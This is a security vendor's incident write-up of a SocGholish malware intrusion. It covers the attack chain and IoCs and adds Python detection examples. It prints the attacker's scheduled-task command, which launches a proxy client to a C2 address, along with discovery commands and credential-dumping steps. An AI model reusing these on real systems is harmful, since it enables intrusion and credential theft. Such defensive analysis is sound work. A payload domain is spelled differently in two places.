
SenseOn MDR vs. SocGholish: A Technical Analysis

This blog was written by Matthew O’Neil, SenseOn Security Analyst.

In February 2024, SenseOn was contacted to assist with investigating suspicious activity on a customer’s estate. SenseOn analysts quickly confirmed a malware infection and identified the variant as SocGholish. This blog showcases SenseOn’s detection and response capabilities against the malware and breaks down the techniques used by SocGholish and by the threat actor observed.

Background


Figure 1: CIS Q1 Malware Trends


Attack Chain

Initial Access & Execution


This subdomain was last seen on May 14th and is not active at the time of writing. The website appears to be a half-finished WordPress site, possibly compromised and used as part of the SocGholish distribution network. 

Figure 2: Malicious WP Site

Because obfuscated JavaScript loaders are a known and common way to begin a malicious execution chain, the execution of the script triggered a SenseOn observation and raised a high-priority case. 

Unfortunately, this customer did not have SenseOn’s MDR service at the time of this incident. Therefore, SenseOn did not become involved until after being contacted by the organisation. 

Figure 3: JS Observation

Once executed, the script was seen periodically beaconing to the C2 domain ‘hjpg.members.openarmscv[.]com’ over a total of 21 HTTPS connections to retrieve additional payloads and notify the attacker of the successful infection. Approximately 8 hours and 24 minutes after the execution of ‘Update.js’, SenseOn detected malicious discovery activity, with the delay in activity potentially being used to evade detection. 

Discovery

Throughout the intrusion, SenseOn observed the execution of numerous Windows-native discovery commands to retrieve and store information about the victim's device, account and network. The attacker was seen gathering data from Chrome and Edge as well as executing the commonly seen commands below.

  • net group "domain users" /domain

  • net user [username] /domain

  • systeminfo

  • ipconfig /all

  • cmdley /list

The last command listed, ‘cmdley /list’, is a typo of the intended command ‘cmdkey /list’. This may indicate a typo in a discovery script, or it may suggest that the discovery was hands-on-keyboard activity rather than automated. Nonetheless, a number of these commands were detected by SenseOn, shown below alongside the ‘cmdley’ command from telemetry.

Figures 4-5-6: Discovery
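The discovery burst above, and the ‘cmdley’ typo in particular, is the kind of thing a detection rule should catch even when the command is mistyped. The following is an added example (not SenseOn’s own detection logic) that groups discovery commands per host inside a short window and fuzzy-matches the executable name so a one-character slip still counts; the telemetry lines and the hostnames are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from difflib import SequenceMatcher

# Windows-native discovery executables named in the write-up (nltest/quser from lateral movement).
DISCOVERY_CMDS = {"net", "systeminfo", "ipconfig", "cmdkey", "nltest", "quser"}
WINDOW = timedelta(minutes=10)   # burst window per host
THRESHOLD = 3                    # distinct discovery commands needed to alert

# Constructed telemetry in a hypothetical "<iso time> <host> <command line>" layout,
# not SenseOn's real format. WS-0143 mirrors the burst in the write-up, typo included.
TELEMETRY = """\
2024-02-14T18:41:03 WS-0143 net group "domain users" /domain
2024-02-14T18:41:09 WS-0143 net user jdoe /domain
2024-02-14T18:41:15 WS-0143 systeminfo
2024-02-14T18:41:20 WS-0143 ipconfig /all
2024-02-14T18:41:31 WS-0143 cmdley /list
2024-02-14T09:10:00 WS-0200 ipconfig /all
2024-02-14T15:30:00 WS-0200 systeminfo
"""

def normalise(cmdline):
    """Return (executable as typed, canonical discovery name or None)."""
    exe = cmdline.strip().split()[0].lower().rsplit("\\", 1)[-1]
    exe = exe[:-4] if exe.endswith(".exe") else exe
    if exe in DISCOVERY_CMDS:
        return exe, exe
    for canon in DISCOVERY_CMDS:  # tolerate a one-character slip such as 'cmdley' for 'cmdkey'
        if len(canon) > 4 and SequenceMatcher(None, exe, canon).ratio() >= 0.8:
            return exe, canon
    return exe, None

def find_discovery_bursts(text):
    """Alert once per host whose distinct discovery commands cluster inside WINDOW."""
    by_host = defaultdict(list)
    for line in text.splitlines():
        ts, host, cmdline = line.split(maxsplit=2)
        exe, canon = normalise(cmdline)
        if canon:
            by_host[host].append((datetime.fromisoformat(ts), canon, exe != canon))
    alerts = []
    for host, evs in by_host.items():
        evs.sort()
        for i, (start, _, _) in enumerate(evs):
            window = [e for e in evs[i:] if e[0] - start <= WINDOW]
            distinct = {e[1] for e in window}
            if len(distinct) >= THRESHOLD:
                alerts.append({"host": host, "start": start.isoformat(), "commands": sorted(distinct),
                               "typo_variants": sorted({e[1] for e in window if e[2]})})
                break
    return alerts
```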


Resource Development

Following the initial discovery, additional payloads were retrieved by SocGholish from the following hosting sites, primarily interacted with using the Invoke-WebRequest PowerShell cmdlet. Downloaded files were stored and named similarly to those seen during discovery (e.g. ‘rad2BA74.tmp’).

  • hjpg.members.openarmscv[.]com

  • mello-roos[.]com

  • sallassutherland[.]com

Following the connection to the first domain, ‘hjpg.members.openarmscv[.]com’, a downloaded file named ‘radD810D.tmp’ was renamed and executed as ‘da207292.js’. As a result of this execution, connections were made to the latter two locations listed above to retrieve additional files. This technique of masquerading file types using the ‘.tmp’ extension was employed heavily throughout the intrusion. 
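The ‘.tmp’-to-‘.js’ rename described above is a cheap correlation to hunt for: a file written with a ‘.tmp’ extension, renamed to a script extension, and then launched by a script host shortly afterwards. This is an added example of that correlation (not SenseOn’s own logic) over constructed telemetry; the directory and the pipe-delimited layout are assumptions, while the file names follow the write-up.

```python
import os
from datetime import datetime, timedelta

SCRIPT_EXTS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
MAX_GAP = timedelta(minutes=30)   # rename and launch must fall within this gap

# Constructed telemetry in a hypothetical "<iso time>|<event>|<field1>|<field2>" layout (not
# SenseOn's format). Rename rows carry old|new path; process rows carry image|script argument.
# The file names mirror the write-up; the Temp directory is an assumed location.
TELEMETRY = """\
2024-02-14T10:02:11|rename|C:\\Users\\jdoe\\AppData\\Local\\Temp\\radD810D.tmp|C:\\Users\\jdoe\\AppData\\Local\\Temp\\da207292.js
2024-02-14T10:02:14|process|wscript.exe|C:\\Users\\jdoe\\AppData\\Local\\Temp\\da207292.js
2024-02-14T11:15:40|rename|C:\\Users\\jdoe\\Downloads\\report.tmp|C:\\Users\\jdoe\\Downloads\\report.pdf
2024-02-14T11:16:02|process|AcroRd32.exe|C:\\Users\\jdoe\\Downloads\\report.pdf
"""

def find_tmp_masquerade(text):
    """Pair a *.tmp -> script-extension rename with a later script-host launch of that file."""
    renamed = {}   # new path (lower-cased) -> (rename time, original .tmp path)
    hits = []
    for line in text.splitlines():
        ts, kind, first, second = line.split("|", 3)
        ts = datetime.fromisoformat(ts)
        if kind == "rename":
            if first.lower().endswith(".tmp") and os.path.splitext(second)[1].lower() in SCRIPT_EXTS:
                renamed[second.lower()] = (ts, first)
        elif kind == "process" and first.lower() in SCRIPT_HOSTS:
            match = renamed.get(second.lower())
            if match and ts - match[0] <= MAX_GAP:
                hits.append({"host_process": first, "original": match[1], "script": second,
                             "delay_s": int((ts - match[0]).total_seconds())})
    return hits
```

The benign rename of ‘report.tmp’ to ‘report.pdf’ is included so the rule can be seen ignoring a non-script extension.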

Figure 7: JavaScript Observation

Connections to these domains were detected as malicious by SenseOn, and raised observations including the one below. 

Figure 8: C2 Observation

Additional software was installed to assist with discovery and persistence. Firstly, Python3 was downloaded and installed using Wget to ensure the functionality of the Python script implemented for persistence. This Wget command was detected as shown below. 

Figure 9: Python Installation Observation

Shortly after this installation, SenseOn also detected a PowerShell WebClient being used to download a PowerSharpPack script from GitHub. PowerSharpPack is a collection of post-exploitation PowerShell tools written in C#. This includes tools such as SauronEye for searching for password files, the SharPersist persistence toolkit, and SharpChromium, used to retrieve Chromium data such as cookies and logins.

Figure 10: SharpChromium Observation

In the same command, the attacker calls on the SharpChromium tool and specifies the ‘logins’ argument to return all saved credentials that have non-empty passwords and store them in the file ‘rad90F69.tmp’. 

Persistence & C2


schtasks /create /f /tn "pypi-py" /tr "c:\programdata\py3\pythonw.exe c:\programdata\py3\a-temp.py -ip 92.118.112[.]208 -port 443" /sc minute /mo 5

Based on previous research, the file appears to be a SOCKS5 proxy client used to provide C2 communications. 
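A scheduled task like the one above carries several tells in its command line alone: a windowless interpreter under ProgramData, a hard-coded IP and port as arguments, and a five-minute interval. The following added example (not SenseOn’s own tooling) parses the ‘schtasks /create’ switches from the command line quoted above and lists those traits; the heuristics are this example’s own, and the IP is left de-fanged as published.

```python
import re

INTERPRETERS = {"pythonw.exe", "python.exe", "wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}

# The task command line quoted in the write-up, with the IP address left de-fanged as published.
TASK_CMD = (r'schtasks /create /f /tn "pypi-py" /tr "c:\programdata\py3\pythonw.exe '
            r'c:\programdata\py3\a-temp.py -ip 92.118.112[.]208 -port 443" /sc minute /mo 5')

def tokenize(cmdline):
    """Split on whitespace while keeping double-quoted values (e.g. the /tr program) intact."""
    return [q or w for q, w in re.findall(r'"([^"]*)"|(\S+)', cmdline)]

def parse_schtasks(cmdline):
    """Map each /switch to its value, or True for bare flags such as /f."""
    tokens, switches, i = tokenize(cmdline), {}, 1
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("/"):
            has_value = i + 1 < len(tokens) and not tokens[i + 1].startswith("/")
            switches[tok.lower()] = tokens[i + 1] if has_value else True
            i += 2 if has_value else 1
        else:
            i += 1
    return switches

def assess_task(cmdline):
    """Return the parsed task plus the traits that make this one worth a closer look."""
    sw = parse_schtasks(cmdline)
    tr = sw.get("/tr", "")
    tr_tokens = tokenize(tr)
    program = tr_tokens[0].lower() if tr_tokens else ""
    findings = []
    if program.rsplit("\\", 1)[-1] in INTERPRETERS:
        findings.append("task runs a script interpreter rather than a service binary")
    if "\\programdata\\" in program:
        findings.append("interpreter lives in user-writable ProgramData")
    m = re.search(r"-ip\s+(\S+)\s+-port\s+(\d+)", tr)   # re-fang '[.]' so the IP can be looked up
    remote = (m.group(1).replace("[.]", "."), int(m.group(2))) if m else None
    if remote:
        findings.append("hard-coded remote IP and port passed on the command line")
    if str(sw.get("/sc", "")).lower() == "minute" and int(sw.get("/mo", 0) or 0) <= 5:
        findings.append("runs every few minutes, a beacon-like interval")
    return {"task": sw.get("/tn"), "program": program, "args": tr_tokens[1:], "remote": remote,
            "schedule": f"{sw.get('/sc')}/{sw.get('/mo')}", "findings": findings}
```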

Throughout this intrusion, numerous domains were accessed by the dropper to retrieve additional payloads; however, the primary C2 channel was established between the beachhead device and the server specified in the scheduled task, ‘92.118.112[.]208’. At the time of writing, only 4 VirusTotal vendors flag this IP address as malicious.

Once C2 communication began, SenseOn was able to quickly detect the network traffic using SenseOn threat intelligence detections, assisting in attributing the threat to SocGholish. 

Figure 11: C2 Threat Intelligence Observation

Lateral Movement

Once the proxy client was established, the attacker was observed moving laterally to adjacent servers using RDP and executing similar discovery commands on each server. Here we can also see the ping utility used to check connectivity back to the beachhead and the internet.

  • net user [username]

  • net user [username] /domain

  • net group "domain admins" /domain

  • nltest /domain_trusts

  • quser /server:[servername]

  • ping [beachhead]

  • ping google.com

Furthermore, the attacker was observed using the ‘reg.exe’ Windows utility on multiple servers to dump credentials from registry hives, using the commands shown in the endpoint telemetry below.

Figure 12: Registry dumping telemetry

Containment & Eradication

Once SenseOn responded and confirmed the presence of malware through the analysis above, the beachhead device was isolated using SenseOn Active Response. To ensure containment, SenseOn, in collaboration with the client, also isolated several devices which had been accessed by the attacker. A selection of these devices was then reimaged and the threat was eradicated from the network.    

Following the containment and eradication of the threat, SenseOn provided enhanced monitoring for the estate by our 24/7 global SOC. This included case monitoring and threat hunts for malicious activity for a set time period after the incident.

Timeline

Conclusion

Once the malware infection was confirmed by the SenseOn SOC, SenseOn was able to use Active Response to assist in containing the threat by isolating numerous devices on the network. This allowed the organisation to eradicate remnants of the threat and recover the servers, as well as reimage the initially compromised device. Through this breakdown, we have detailed SenseOn’s detection capabilities and service response to the SocGholish malware.


Figure 11: Malicious SocGholish site

The extent of attacks such as this one demonstrates the need for businesses to deploy and maintain robust detection and response solutions that give responders visibility into threats and the ability to act on them.

IoCs

Domains

  • pluralism.themancav[.]com

  • hjpg.members.openarmscv[.]com

  • dallassutherland[.]com

  • mello-roos[.]com 

  • miraclesofeucharisticjesus[.]org

IP Addresses

  • 92.118.112[.]208

References

  1. CIS Blog: https://www.cisecurity.org/insights/blog/top-10-malware-q1-2024

  2. Proofpoint Blog: https://www.proofpoint.com/uk/blog/email-and-cloud-threats/detecting-analyzing-socgholish-attack

  3. TrueSec Blog: https://www.truesec.com/hub/blog/are-the-notorious-cyber-criminals-evil-corp-actually-russian-spies

  4. Red Canary Threat Detection Report: https://redcanary.com/threat-detection-report/threats/socgholish/

  5. Trend Micro Research: https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html

  6. ReliaQuest Blog: https://www.reliaquest.com/blog/new-python-socgholish-infection-chain/

  7. Malware Bazaar sample reported by SquiblydooBlog: https://bazaar.abuse.ch/sample/546191fbae56a18d93abc82099ee355532e944fbaec50239c139144af1d42a55/